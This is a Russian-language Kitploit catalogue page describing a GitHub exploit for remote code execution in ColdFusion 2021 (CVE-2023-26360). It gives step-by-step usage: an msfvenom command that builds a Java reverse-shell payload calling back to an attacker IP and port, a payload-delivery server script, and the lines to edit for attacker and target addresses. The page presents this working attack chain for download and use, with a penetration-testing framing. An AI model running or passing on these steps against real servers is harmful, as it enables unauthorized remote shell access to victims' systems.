Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-26360-RCE — Эксплойт для удалённого выполнения кода в ColdFusion 2021 (CVE-2023-26360) | Kitploit
Инструменты/GitHubGitHub/h3rm1tr3b0rn/cve-2023-26360-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubh3rm1tr3b0rn/cve-2023-26360-rce

CVE-2023-26360-RCE

Эксплойт для удалённого выполнения кода в ColdFusion 2021 (CVE-2023-26360)

Репозиторий
19 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-26360 - Удаленное выполнение кода на ColdFusion 2021

Иногда скрипты не срабатывают с первой попытки. Попробуйте несколько раз, чтобы всё заработало.

Как выполнить

Создайте полезную нагрузку с помощью msfvenom

root@kitploit:~
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java

Запуск server.py

  • Этот сервер отправит полезную нагрузку на сервер ColdFusion после первоначального доступа с помощью cve.2023-26360.py, поэтому его нужно инициализировать первым.
root@kitploit:~
python3 server.py 8000
  • Аргумент 8000 — это порт, который будет прослушивать сервер.

  • Важно отметить, что строка 12 настраивает IP-адрес сервера, поэтому измените его:

root@kitploit:~
s.bind(('192.168.56.1',port))

Запуск cve-2023-26360.py

  • Чтобы запустить эксплойт, выполните:
root@kitploit:~
python3 cve-2023-26360.py 8000
  • Как и в server.py, аргумент 8000 — это порт, который будет прослушивать server.py. Поэтому он должен быть одинаковым в обеих командах.

  • Строка 8 в cve-2023-26360.py задаёт IP-адрес, который будет прослушивать server.py. Необходимо настроить его правильно.

  • Строка 11 в cve-2023-26360.py задаёт IP-адрес сервера ColdFusion, поэтому измените его:

root@kitploit:~
url = "http://192.168.56.102:8500"

Протестировано на

  • ColdFusion 2021 - Windows Server 2019
Скачать инструмент